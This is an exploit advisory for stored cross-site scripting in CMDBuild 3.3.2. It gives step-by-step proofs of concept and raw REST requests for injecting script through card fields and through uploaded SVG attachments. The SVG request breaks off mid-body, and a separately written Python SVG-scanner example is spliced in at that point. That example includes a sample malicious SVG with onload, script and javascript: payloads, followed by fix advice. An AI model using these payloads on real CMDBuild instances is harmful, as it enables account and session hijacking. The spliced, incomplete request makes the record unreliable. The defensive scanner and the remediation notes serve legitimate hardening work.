# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux

Summary:

Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 (reproduced here on 3.3.2) allow remote, low-privileged authenticated users to inject arbitrary web script or HTML, either through a crafted SVG document uploaded as an attachment or through card field values that are later rendered unescaped. The attack vectors include Add Attachment, Add Office, and Add Employee; almost all "Add" sections are affected.

Proof of concept:

Stored XSS example (card fields):

1. Log in to your dashboard as a low-privilege user.
2. Click on Basic archives, then Employee.
3. Click "+ Add card" for Employee.
4. Enter your XSS payload in the card fields (Code, Surname and Name in the request below).
5. On the added employee, click "Open Relation Graph"; the stored payload executes.

Request:

POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close

{"_type":"Employee","_tenant":"","Code":"\">","Description":null,"Surname":"\">","Name":"\">","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}

------------------------------------------------------------------------

File upload XSS example (SVG attachment):

1. Click on Basic archives.
2. Click on Workplace, then "+ Add card" for Workplace.
3. Select the "attachments" icon, then "+ Add attachment" and choose an image.
4. Upload your SVG file containing the XSS payload.
5. Click on preview, then right-click and open in a new tab; the SVG is served as image/svg+xml in the application's origin and its script executes.

Request:

POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open

-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml
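The attachment vector above works because the server stores whatever is declared as image/svg+xml and later serves it inline, so any script, event handler or javascript: link inside the file runs in the application's origin. The following is an added example of the server-side check a practitioner would want on that upload path; it is not CMDBuild code and the function names, the two sample SVG files and the decision to reject (rather than sanitize) are assumptions of this example. The stand-alone scanner parses the file as XML and reports every construct that can execute when the SVG is rendered as a document.

```python
"""Detect active content in an uploaded SVG before it is stored or served.

Added example (not CMDBuild code). It assumes an upload handler that can
call svg_upload_allowed() on the raw file bytes and reject the file when
it returns False. Sample SVGs below are constructed for this example.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# Elements that execute script or embed another document when an SVG is
# opened as a page (as in step 5 of the PoC) rather than via <img>.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}

# href schemes that run code or smuggle a document instead of linking to one.
ACTIVE_URI = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.IGNORECASE)


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1].lower()


def svg_active_content(data: bytes) -> list[str]:
    """Return a list of findings describing active content in the SVG bytes.

    An empty list means nothing suspicious was found. A parse error is itself
    a finding: a file the XML parser cannot read must not be accepted and
    served as image/svg+xml either, since the browser may still sniff it.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings: list[str] = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")

    for elem in root.iter():  # document order, root included
        tag = _local(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.startswith("on"):  # onload=, onclick=, onmouseover=, ...
                findings.append(f"<{tag} {name}=...> event handler")
            elif name == "href" and ACTIVE_URI.match(value):  # href / xlink:href
                findings.append(f"<{tag} href={value.strip()[:20]!r}> active URI")
    return findings


def svg_upload_allowed(data: bytes) -> bool:
    """Policy wrapper: store the SVG only if the scanner found nothing."""
    return not svg_active_content(data)


# Constructed samples: a harmless icon and a file carrying the three
# classic SVG XSS carriers (event handler, <script>, javascript: link).
BENIGN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
    b'<rect width="10" height="10" fill="green"/></svg>'
)
MALICIOUS_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" '
    b'xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.domain)">'
    b'<script>alert(1)</script>'
    b'<a xlink:href="javascript:alert(2)"><text y="20">click</text></a></svg>'
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        print(label, "allowed" if svg_upload_allowed(sample) else "rejected",
              svg_active_content(sample))
```

The scanner is a blocklist and should be treated as defence in depth: the fix that removes the vector outright is to serve every attachment with Content-Disposition: attachment (or from a separate origin with a restrictive Content-Security-Policy), so that a preview opened in a new tab downloads the file instead of rendering it in the CMDBuild origin. The card-field vector needs the complementary fix of HTML-escaping Code, Surname and Name wherever the relation graph renders them.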